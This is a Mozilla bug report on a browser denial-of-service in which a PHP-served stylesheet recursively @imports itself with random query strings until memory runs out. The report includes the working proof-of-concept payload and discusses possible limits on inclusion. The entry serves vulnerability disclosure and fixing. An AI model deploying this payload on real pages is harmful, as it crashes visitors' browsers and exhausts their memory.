Open Bug 618933 Opened 15 years ago Updated 3 years ago

Stylesheet recursive inclusion denial of service

Categories

(Core :: CSS Parsing and Computation, defect)

Product:
Core
Component:
CSS Parsing and Computation
Platform:
x86
macOS
Type:
defect

Tracking

()

People

(Reporter: dveditz, Unassigned)

Details

(Whiteboard: [sg:dos])

K Calhoun writes that a malicious recursive stylesheet can lock up the browser and exhaust memory. Imagine a page containing <LINK href="lock.php" rel="stylesheet" type="text/css"> Where lock.php consists of references to itself with a random query parameter to prevent cache hits: <?php header("Content-type: text/css"); ?> @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); @import url("./lock.php?<?php echo rand(10000,90000);?>"); <?php echo rand(1000,9000);?>{ color:blue; } *{ color:red; } Eventually the browser will chew up memory and die. If the browser tab is closed it will still churn for a while (on the queued requests?). The reporter suggests "it can be mitigated through having counters and/or lockouts on the number of imported stylesheets one page is allowed, similar to how the browser currently has checks against complex redirect loops." I don't know if that's an effective approach apart from a hard-coded ceiling on stylesheet includes. If we limit recursion depth the attack can avoid that by lengthening the list of includes at each level. If we limit by domain attackers can set up an infinite number of virtual subdomains. If we limit by eTLD+1 the attacker shells out a bit of cash for more domains.
A max-inclusion-depth would at least keep the attack from being infinite, but probably no realistic limit would prevent a DoS if each stylesheet loaded zillions of child sheets.
Severity: normal → S3
You need to log in before you can comment on or make changes to this bug.